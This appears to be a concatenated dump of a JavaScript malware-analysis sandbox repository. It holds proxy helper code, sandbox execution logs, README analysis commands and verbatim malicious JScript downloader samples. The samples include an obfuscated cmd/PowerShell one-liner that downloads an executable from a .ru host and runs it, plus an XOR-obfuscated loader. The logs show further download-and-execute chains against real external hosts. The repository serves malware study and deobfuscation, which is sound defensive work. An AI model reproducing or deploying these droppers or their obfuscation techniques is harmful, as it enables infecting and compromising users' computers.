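                vname = name.toString();
                if (typeof value === 'undefined') {
                    if (_proxy_options.dont_fail)
                        util_log(">>> FIXME: " + target._name + "[" + vname + "] not defined");
                    else
                        throw new TypeError(">>> FIXME: " + target + "[" + vname + "] not defined");
                } else {
                    util_log(">>> FIXME: " + target._name + "[" + vname + "] reflected to " + typeof value);
                }
            }

            return value;
        },
        set: function(target, name, value) {
            if (_proxy_options.verbose) {
                var vname = typeof name === 'symbol' ? name.toString() : name;
                util_log("Proxy.set: " + _truncateOutput(target.toString(), 50) + "[" + vname + "]");
            }
            if (name in target)
                return Reflect.set(target, name, value);
            if (typeof name === 'string') {
                var lcname = name.toLowerCase();
                if (lcname in target)
                    return Reflect.set(target, lcname, value);
            }
            return Reflect.set(target, name, value);
        },
        construct: function(target, args, newTarget) {
            if (_proxy_options.verbose) {
                util_log("Proxy.construct: " + target + "(" + _truncateOutput(args.join(", "), 50) + ")");
            }
            // Instances get the same member resolution and FIXME reporting.
            return _proxy(Reflect.construct(target, args, newTarget));
        },
        apply: function(target, that, args) {
            if (_proxy_options.verbose) {
                util_log("Proxy.apply: " + target + "(" + _truncateOutput(args.join(", "), 50) + ")");
            }
            return Reflect.apply(target, that, args);
        }
    });
    return ret;
};
_proxy.toString = () => {
    return "_proxy";
};

// When loaded as a Node module (e.g. by the tests) export the helpers and
// route util_log to console.log; in the sandbox context the runner provides
// util_log itself.
if (typeof module !== 'undefined') {
    var exports = module.exports = {};
    exports._proxy = _proxy;
    exports._proxy_options = _proxy_options;
    exports._defineSingleProperty = _defineSingleProperty;
    var util_log = console.log;
}
// Strange, does not work in node
//Date.toStringOrig = Date.prototype.toString;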
165 | //// 166 | //Date.prototype.toString = function() { 167 | // // Node: Sat,Oct,22,2016,22:20:52,GMT+0200,(CEST) 168 | // // WSH: Sat,Oct,22,22:07:32,UTC+0200,2016 169 | // util_log("called") 170 | // var a = this.toStringOrig().split(" "); 171 | // var b = a.slice(3); 172 | // b[3] = a[4]; 173 | // b[4] = a[5]; 174 | // b[5] = a[3]; 175 | // return b.join(" "); 176 | // } 177 | // //Date.prototype.inspect = Date.prototype.toString; 178 | -------------------------------------------------------------------------------- /malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output: -------------------------------------------------------------------------------- 1 | 31 May 23:29:16 - Malware sandbox ver. 0.4 2 | 31 May 23:29:16 - ------------------------ 3 | 31 May 23:29:16 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js 4 | 31 May 23:29:16 - Malware files: malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js 5 | 31 May 23:29:16 - Output file for sandbox dump: sandbox_dump_after.json 6 | 31 May 23:29:16 - Output directory for generated files: output/ 7 | 31 May 23:29:16 - ==> Preparing Sandbox environment. 8 | 31 May 23:29:16 - => Executing: env/utils.js 9 | 31 May 23:29:16 - => Executing: env/eval.js 10 | 31 May 23:29:16 - Preparing sandbox to intercept eval() calls. 11 | 31 May 23:29:16 - => Executing: env/function.js 12 | 31 May 23:29:16 - Preparing sandbox to intercept 'new Function()' calls. 13 | 31 May 23:29:16 - => Executing: env/wscript.js 14 | 31 May 23:29:16 - Preparing sandbox to emulate WScript environment. 15 | 31 May 23:29:16 - => Executing: env/browser.js 16 | 31 May 23:29:16 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 31 May 23:29:16 - Created: window[1] 18 | 31 May 23:29:16 - document.createElement(body) 19 | 31 May 23:29:16 - Element[2] created with name: 'body' 20 | 31 May 23:29:16 - => Executing: env/agents.js 21 | 31 May 23:29:16 - Setting Browser environment to: IE8 on Win10 64bit 22 | 31 May 23:29:16 - => Executing: env/other.js 23 | 31 May 23:29:16 - ==> Executing malware file(s). 24 | 31 May 23:29:16 - => Executing: malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js 25 | 31 May 23:29:16 - Potentially contains continue within a catch 26 | 31 May 23:29:16 - Strict mode: false 27 | 31 May 23:29:16 - Calling eval() no.: 1 28 | 31 May 23:29:16 - WScript.CreateObject(WScript.Shell) 29 | 31 May 23:29:16 - Created: WScript.Shell[4] 30 | 31 May 23:29:16 - WScript.Shell[4].ExpandEnvironmentStrings(%TEMP%/) 31 | 31 May 23:29:16 - WScript.CreateObject(WinHttp.WinHttpRequest.5.1) 32 | 31 May 23:29:16 - Created: MSXML2.XMLHTTP[5] 33 | 31 May 23:29:16 - MSXML2.XMLHTTP[5].open(GET,http://204.232.192.84/9dojp,false) 34 | 31 May 23:29:16 - MSXML2.XMLHTTP[5].send(undefined) 35 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].onreadystatechange(), readyState = 4 length: 146948 status: 200 36 | 31 May 23:29:18 - MSXML2.XMLHTTP[5] statusText = null 37 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].responseBody = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(?} ... (truncated)' 38 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].status = '200' 39 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].onreadystatechange() undefined 40 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].send(undefined) finished 41 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 42 | 31 May 23:29:18 - Created: ADODB_Stream[6] 43 | 31 May 23:29:18 - ADODB_Stream[6].Open() 44 | 31 May 23:29:18 - ADODB_Stream[6].type = '1' 45 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].ResponseBody.get() 46 | 31 May 23:29:18 - ADODB_Stream[6].content = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(?} ... 
(truncated)' 47 | 31 May 23:29:18 - ADODB_Stream[6].Write(str) - 146948 bytes 48 | 31 May 23:29:18 - ADODB_Stream[6].size = '146948' 49 | 31 May 23:29:18 - ADODB_Stream[6].position = '0' 50 | 31 May 23:29:18 - ADODB_Stream[6].SaveToFile(%TEMP%/Hkf3vagihtHtFwa, 2) 51 | 31 May 23:29:18 - ADODB_Stream[6].content.get() 52 | 31 May 23:29:18 - ADODB_Stream[6].Close() 53 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 54 | 31 May 23:29:18 - Created: ADODB_Stream[7] 55 | 31 May 23:29:18 - ADODB_Stream[7].type = '2' 56 | 31 May 23:29:18 - ADODB_Stream[7].Charset = '437' 57 | 31 May 23:29:18 - ADODB_Stream[7].Open() 58 | 31 May 23:29:18 - ADODB_Stream[7].type.get() 59 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 60 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 61 | 31 May 23:29:18 - ADODB_Stream[7].content = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(? ... (truncated)' 62 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 63 | 31 May 23:29:18 - ADODB_Stream[7].content.get() 64 | 31 May 23:29:18 - ADODB_Stream[7].LoadFromFile(%TEMP%/Hkf3vagihtHtFwa) 146948 bytes, encoding: 437 65 | 31 May 23:29:18 - ADODB_Stream[7].Position = '0' 66 | 31 May 23:29:18 - ADODB_Stream[7].ReadText.get() 67 | 31 May 23:29:18 - ADODB_Stream[7].Close() 68 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 69 | 31 May 23:29:18 - Created: ADODB_Stream[8] 70 | 31 May 23:29:18 - ADODB_Stream[8].type = '2' 71 | 31 May 23:29:18 - ADODB_Stream[8].Charset = '437' 72 | 31 May 23:29:18 - ADODB_Stream[8].Open() 73 | 31 May 23:29:19 - ADODB_Stream[8].type.get() 74 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 75 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 76 | 31 May 23:29:19 - ADODB_Stream[8].content = 'MZ?@?!?L?!This program cannot be ... 
(truncated)' 77 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 78 | 31 May 23:29:19 - ADODB_Stream[8].WriteText(str) - 146944 bytes, encoding: 437 79 | 31 May 23:29:19 - ADODB_Stream[8].content.get() 80 | 31 May 23:29:19 - ADODB_Stream[8].size = '146944' 81 | 31 May 23:29:19 - ADODB_Stream[8].SaveToFile(%TEMP%/Hkf3vagihtHtFwa.exe, 2) 82 | 31 May 23:29:19 - ADODB_Stream[8].content.get() 83 | 31 May 23:29:19 - ADODB_Stream[8].Close() 84 | 31 May 23:29:19 - WScript.Shell[4].Run(%TEMP%/Hkf3vagihtHtFwa.exe 123, undefined, undefined) 85 | 31 May 23:29:19 - WScript.Quit(0) 86 | 31 May 23:29:19 - ==> Script execution finished, dumping sandbox environment to a file. 87 | 31 May 23:29:19 - MSXML2.XMLHTTP[5].ResponseBody.get() 88 | 31 May 23:29:21 - Saving: output/_TEMP__Hkf3vagihtHtFwa 89 | 31 May 23:29:21 - Saving: output/_TEMP__Hkf3vagihtHtFwa.exe 90 | 31 May 23:29:22 - Generated file saved 91 | 31 May 23:29:22 - Generated file saved 92 | 31 May 23:29:22 - The sandbox context has been saved to: sandbox_dump_after.json 93 | -------------------------------------------------------------------------------- /malware/20160531/README.md: -------------------------------------------------------------------------------- 1 | Analysis of https://malwr.com/analysis/ZTA4ZDk5MDNiN2VjNDk4ZDgwOTU4NDBmYTAxZDVmOWI/ 2 | -------------------------------------------------------------------------------- /malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.txt: -------------------------------------------------------------------------------- 1 | Malware as found here: 2 | https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/ 3 | -------------------------------------------------------------------------------- /malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out: -------------------------------------------------------------------------------- 1 | 30 Sep 01:02:11 - mailware-jail, a malware sandbox ver. 
0.5 2 | 30 Sep 01:02:11 - ------------------------ 3 | 30 Sep 01:02:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 30 Sep 01:02:11 - Malware files: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 5 | 30 Sep 01:02:11 - Output file for sandbox dump: sandbox_dump_after.json 6 | 30 Sep 01:02:11 - Output directory for generated files: output/ 7 | 30 Sep 01:02:11 - ==> Preparing Sandbox environment. 8 | 30 Sep 01:02:11 - => Executing: env/utils.js 9 | 30 Sep 01:02:11 - => Executing: env/eval.js 10 | 30 Sep 01:02:11 - Preparing sandbox to intercept eval() calls. 11 | 30 Sep 01:02:11 - => Executing: env/function.js 12 | 30 Sep 01:02:11 - Preparing sandbox to intercept 'new Function()' calls. 13 | 30 Sep 01:02:11 - => Executing: env/wscript.js 14 | 30 Sep 01:02:11 - Preparing sandbox to emulate WScript environment. 15 | 30 Sep 01:02:11 - => Executing: env/browser.js 16 | 30 Sep 01:02:11 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 30 Sep 01:02:11 - Created: window[1] 18 | 30 Sep 01:02:11 - Created: document[2] 19 | 30 Sep 01:02:11 - document[2].createElement(html) 20 | 30 Sep 01:02:11 - Element[3] created, named: 'html' 21 | 30 Sep 01:02:11 - document[2].createElement(body) 22 | 30 Sep 01:02:11 - Element[5] created, named: 'body' 23 | 30 Sep 01:02:11 - document[2].body = 'Element[5]' 24 | 30 Sep 01:02:11 - document[2].createElement(head) 25 | 30 Sep 01:02:11 - Element[7] created, named: 'head' 26 | 30 Sep 01:02:11 - Element[3].appendChild(Element[7]) 27 | 30 Sep 01:02:11 - Element[3].firstChild set 28 | 30 Sep 01:02:11 - document[2].body.get() => Element[5] 29 | 30 Sep 01:02:11 - Element[3].appendChild(Element[5]) 30 | 30 Sep 01:02:11 - => Executing: env/agents.js 31 | 30 Sep 01:02:11 - Setting Browser environment to: IE8 on Win10 64bit 32 | 30 Sep 01:02:11 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 30 Sep 01:02:11 - => Executing: env/other.js 34 | 30 Sep 01:02:11 - => Executing: env/console.js 35 | 30 Sep 01:02:11 - ==> Executing malware file(s). 36 | 30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 37 | 30 Sep 01:02:11 - Strict mode: false 38 | 30 Sep 01:02:11 - Calling eval() no.: 1 39 | 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 40 | 30 Sep 01:02:11 - Created: WScript.Shell[9] 41 | 30 Sep 01:02:11 - WScript.SpecialFolders(Desktop) 42 | 30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk) 43 | 30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk) 44 | 30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk 45 | 30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject) 46 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11] created. 
47 | 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 48 | 30 Sep 01:02:11 - Created: WScript.Shell[12] 49 | 30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP) 50 | 30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13] 51 | 30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream) 52 | 30 Sep 01:02:11 - Created: ADODB_Stream[14] 53 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 54 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 55 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0) 56 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true 57 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false' 58 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false 59 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined) 60 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200 61 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null 62 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)' 63 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200' 64 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 65 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished 66 | 30 Sep 01:02:15 - ADODB_Stream[14].type = '1' 67 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 68 | 30 Sep 01:02:15 - ADODB_Stream[14].Open() 69 | 30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)' 70 | 30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes 71 | 30 Sep 01:02:15 - ADODB_Stream[14].size = '196608' 72 | 30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 73 | 30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... 
(truncated) 74 | 30 Sep 01:02:15 - ADODB_Stream[14].Close() 75 | 30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 76 | 30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js) 77 | 30 Sep 01:02:15 - ==> Cleaning up sandbox. 78 | 30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file. 79 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 80 | 30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15] 81 | 30 Sep 01:02:16 - Generated file saved 82 | 30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json 83 | -------------------------------------------------------------------------------- /malware/20161001/README.md: -------------------------------------------------------------------------------- 1 | ## N750991284.js ## 2 | 3 | https://malwr.com/analysis/MzdlYThhNGE0NTZkNGRiMjg4MmE0ZTFmZjMyNTQyYzg/ 4 | => f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js 5 | 6 | Analyze with: 7 | 8 | node jailme.js --down=y malware/20161001/f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js > malware/20161001/f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.out 9 | 10 | ## Wileen.js ## 11 | 12 | https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/ 13 | => a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 14 | 15 | Analyze with: 16 | 17 | node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js > malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out 18 | 19 | ## ORDER-19586.js ## 20 | 21 | https://malwr.com/analysis/YmQ1Y2M1YjAxNGY0NGRlNjllODI4N2Y0MGYzYmI3ZGM/ 22 | => cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js 23 | 24 | This one has very long and nice deobfuscation. 
25 | 26 | Analyze with: 27 | 28 | node jailme.js --down=y malware/20161001/cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js >malware/20161001/cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.out 29 | -------------------------------------------------------------------------------- /malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js: -------------------------------------------------------------------------------- 1 | var izacvabno = 'u/js/boxu'; 2 | var vocbalfysf = 0; 3 | var dbuwof = 'n4.bin'; 4 | 5 | function ugyvujgy() { 6 | return "edating.r"; 7 | } 8 | var ezvirqeqvan = "agy"; 9 | 10 | function blyzoxmi() { 11 | var uxlyrdulec = 'ick.doubl'; 12 | return uxlyrdulec; 13 | } 14 | function huzuf() { 15 | return null; 16 | } 17 | function ovxyz() { 18 | var droxhesj = blyzoxmi() + ugyvujgy() + izacvabno + dbuwof; 19 | return droxhesj; 20 | } 21 | var kgebdi = undefined; 22 | 23 | function ivixemy() { 24 | var gjanixi = false; 25 | return gjanixi; 26 | } 27 | if (ivixemy() === false) { 28 | var yrpez = 39.5145; 29 | if (typeof document == "undefined") { 30 | var rinipa = new ActiveXObject("WScRipT.SHEll"); 31 | switch (kgebdi) { 32 | case null: 33 | var wlerlubm = 1; 34 | if (wlerlubm === 1) { 35 | var ebukem = typeof null; 36 | var anwudomild = undefined; 37 | var cojuwpusi = typeof true; 38 | var ovhexreqde = typeof 7.7; 39 | var hpivytr = typeof 'ussizrehe'; 40 | } 41 | break; 42 | case "21747": 43 | var wlerlubm = 1; 44 | if (wlerlubm === 1) { 45 | var ebukem = typeof null; 46 | var anwudomild = undefined; 47 | var cojuwpusi = typeof true; 48 | var ovhexreqde = typeof 7.7; 49 | var hpivytr = typeof 'ussizrehe'; 50 | } 51 | break; 52 | case "83059": 53 | var wlerlubm = 1; 54 | if (wlerlubm === 1) { 55 | var ebukem = typeof null; 56 | var anwudomild = undefined; 57 | var cojuwpusi = typeof true; 58 | var ovhexreqde = typeof 7.7; 59 | var hpivytr = typeof 'ussizrehe'; 60 | } 61 | break; 62 | case 
"19773": 63 | var wlerlubm = 1; 64 | if (wlerlubm === 1) { 65 | var ebukem = typeof null; 66 | var anwudomild = undefined; 67 | var cojuwpusi = typeof true; 68 | var ovhexreqde = typeof 7.7; 69 | var hpivytr = typeof 'ussizrehe'; 70 | } 71 | break; 72 | case undefined: 73 | rinipa.run("cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'" + "http://cl" + ovxyz() + "','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe'", false); 74 | var yhqisunlyrj = typeof null; 75 | var iwvantart = 8; 76 | iwvantart = "ijaneset" + iwvantart; 77 | var pyvifkaqgi = '16479' + 27; 78 | var dxatdims = "bucmiknitdi"; 79 | break; 80 | } 81 | } else { 82 | if (typeof vocbalfysf == 'boolean') { 83 | var egelqo = null; 84 | yvytaq = 'ylsaft' + 914; 85 | var twatolab = 9.03; 86 | var loxanjofu = twatolab + ezvirqeqvan; 87 | loxanjofu = "amxokcug" + loxanjofu; 88 | exgapfokdo = 10 + 'bniwtu'; 89 | ovryhludnam = 24.1754 + "40107"; 90 | var acsybytuk = 6.8702 + 'utozqu'; 91 | var libymnojb = typeof 20; 92 | } 93 | } 94 | } else { 95 | if (huzuf() == null) { 96 | var ohinxe = 'ecilmasc'; 97 | var tamambi = null; 98 | var elrydxiqta = typeof null; 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out: -------------------------------------------------------------------------------- 1 | 1 Oct 13:05:34 - mailware-jail, a malware sandbox ver. 
0.6 2 | 1 Oct 13:05:34 - ------------------------ 3 | 1 Oct 13:05:34 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 1 Oct 13:05:34 - Malware files: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 5 | 1 Oct 13:05:34 - Output file for sandbox dump: sandbox_dump_after.json 6 | 1 Oct 13:05:34 - Output directory for generated files: output/ 7 | 1 Oct 13:05:34 - ==> Preparing Sandbox environment. 8 | 1 Oct 13:05:34 - => Executing: env/utils.js 9 | 1 Oct 13:05:34 - => Executing: env/eval.js 10 | 1 Oct 13:05:34 - Preparing sandbox to intercept eval() calls. 11 | 1 Oct 13:05:34 - => Executing: env/function.js 12 | 1 Oct 13:05:34 - Preparing sandbox to intercept 'new Function()' calls. 13 | 1 Oct 13:05:34 - => Executing: env/wscript.js 14 | 1 Oct 13:05:34 - Preparing sandbox to emulate WScript environment. 15 | 1 Oct 13:05:34 - => Executing: env/other.js 16 | 1 Oct 13:05:34 - => Executing: env/console.js 17 | 1 Oct 13:05:34 - ==> Executing malware file(s). 18 | 1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 19 | 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll) 20 | 1 Oct 13:05:34 - Created: WScript.Shell[1] 21 | 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined) 22 | 1 Oct 13:05:34 - ==> Cleaning up sandbox. 23 | 1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file. 
24 | 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js: -------------------------------------------------------------------------------- 1 | NLWNAGICE(); 2 | 3 | function HTNHCX(GESRUAS) { 4 | 5 | FLFCXUV = parseInt(GESRUAS); 6 | return FLFCXUV; 7 | }; 8 | 9 | function SODXEPKEN(ZCBAHVYOL, GWQCZKRS) { 10 | 11 | DQDIXG = ZCBAHVYOL ^ GWQCZKRS; 12 | 13 | return DQDIXG; 14 | }; 15 | 16 | function HWSELX(RJSGZJN, XHZGH) { 17 | // util_log("HWSELX(" + RJSGZJN + ", " + XHZGH+")"); 18 | 19 | ICKSVUEAO = '0'; 20 | XPMFUE = 'x'; 21 | LMQYPS = ICKSVUEAO + XPMFUE; 22 | ZDJKDKZK = ''; 23 | 24 | FNWVPY = 61 - 58; 25 | QFGCST = 't'; 26 | ENYZLWYO = 'n'; 27 | LBVAC = 'i'; 28 | YOZENUDBO = 'g'; 29 | LNSCLQTC = 'o'; 30 | RUGKXKZUZ = 't'; 31 | GVGEPZOG = 'r'; 32 | KUGNOK = 'S'; 33 | IYCPSYFWX = QFGCST + LNSCLQTC + KUGNOK + RUGKXKZUZ + GVGEPZOG + LBVAC + ENYZLWYO + YOZENUDBO; 34 | 35 | KEDQH = RJSGZJN[IYCPSYFWX](); 36 | 37 | QSVXSXTEF = 'o'; 38 | JZJNXPBYH = 'h'; 39 | CFGINE = 'd'; 40 | DHWNQMC = 'a'; 41 | BXRVZYNTP = 'r'; 42 | AISMTUX = 'C'; 43 | RQAMQZ = 'm'; 44 | AUCPVRV = 'e'; 45 | UJXJUAZ = 'o'; 46 | XVNPQOG = 'f'; 47 | UTRTET = 'r'; 48 | HJWBAPJLC = 'C'; 49 | 50 | NSOSZH = XVNPQOG + UTRTET + QSVXSXTEF + RQAMQZ + AISMTUX + JZJNXPBYH + DHWNQMC + BXRVZYNTP + HJWBAPJLC + UJXJUAZ + CFGINE + AUCPVRV; 51 | MXECAU = 't'; 52 | CKZIO = 's'; 53 | NVFZAOFB = 'b'; 54 | CWFTSPJ = 's'; 55 | KNZKIGW = 'r'; 56 | HQOEB = 'u'; 57 | CNFTMW = CKZIO + HQOEB + NVFZAOFB + CWFTSPJ + MXECAU + KNZKIGW; 58 | 59 | DLJUV = 'g'; 60 | VBCOI = 'n'; 61 | HKNUST = 'h'; 62 | AKNXJ = 't'; 63 | YETVW = 'l'; 64 | ENBPLEBRX = 'e'; 65 | 66 | FCLEFW = KEDQH[YETVW + ENBPLEBRX + VBCOI + DLJUV + AKNXJ + HKNUST]; 67 | 68 | for (var VEHIT = 0; VEHIT < FCLEFW; VEHIT += FNWVPY) { 69 | 70 | GMOLGWSA = LMQYPS; 71 | GMOLGWSA = 
GMOLGWSA + KEDQH[CNFTMW](VEHIT, 2); 72 | DHARERH = HTNHCX(GMOLGWSA); 73 | // util_log("aa:"+DHARERH); 74 | NPNSIMEK = SODXEPKEN(DHARERH, XHZGH); 75 | ZDJKDKZK = ZDJKDKZK + String[NSOSZH](NPNSIMEK); 76 | }; 77 | util_log("HWSELX(" + RJSGZJN + ", " + XHZGH+") => " + ZDJKDKZK); 78 | 79 | return ZDJKDKZK; 80 | }; 81 | 82 | function NLWNAGICE() { 83 | GXZMINO = false; 84 | SBRSRGIOQ = 113 - 110; 85 | KHZAZI = 'J'; 86 | OLNRBHZ = 'X'; 87 | SIZXIWJH = 'G'; 88 | WURGFNQ = 'E'; 89 | APFXKBUM = 'L'; 90 | 91 | AEOCOF = OLNRBHZ + APFXKBUM + WURGFNQ + KHZAZI + SIZXIWJH; 92 | 93 | try { 94 | GXZMINO = JXSEL(AEOCOF); 95 | } catch (Y) { 96 | 97 | WJZLSZQUO = 'm'; 98 | DMRDRQDZ = 'n'; 99 | YUDKNE = 'a'; 100 | CHFLAYM = 'e'; 101 | 102 | QGSBA = 'e'; 103 | WBYWXK = 'r'; 104 | VLMWRPHQ = 't'; 105 | NPDOS = 'A'; 106 | NVMHXEJCN = 'd'; 107 | MERNQAK = 'C'; 108 | XNBSPEJUP = 'o'; 109 | QPZBKFTR = 'c'; 110 | VAWUM = 'h'; 111 | QDRXPLSZU = 'a'; 112 | 113 | util_log("a: " + Y + " b: " + DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM + " c: " + QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ + " d: " + SBRSRGIOQ); 114 | XHZGH = Y[DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM][QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ](SBRSRGIOQ); 115 | }; 116 | if (!GXZMINO) { 117 | util_log("XHZGH " + XHZGH); 118 | XHZGH = XHZGH + 110; 119 | //for (var i = 0; i < 256 ; i+=1) { 120 | // Hynek: Very strange: had to increase by 2 to properly deobfuscate 121 | XHZGH = XHZGH + 2 ;//i; 122 | // Hynek: end 123 | LDSATLTI = HWSELX("82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X", XHZGH); 124 | util_log("LDSATLTI: " + _truncateOutput(LDSATLTI) + " XHZGH: " + XHZGH + " charcode: " + (XHZGH - 110)); 125 | //} 126 | util_log("LDSATLTI " + LDSATLTI); 127 | DYDUHJGS = JXSEL(LDSATLTI); 128 | 129 | 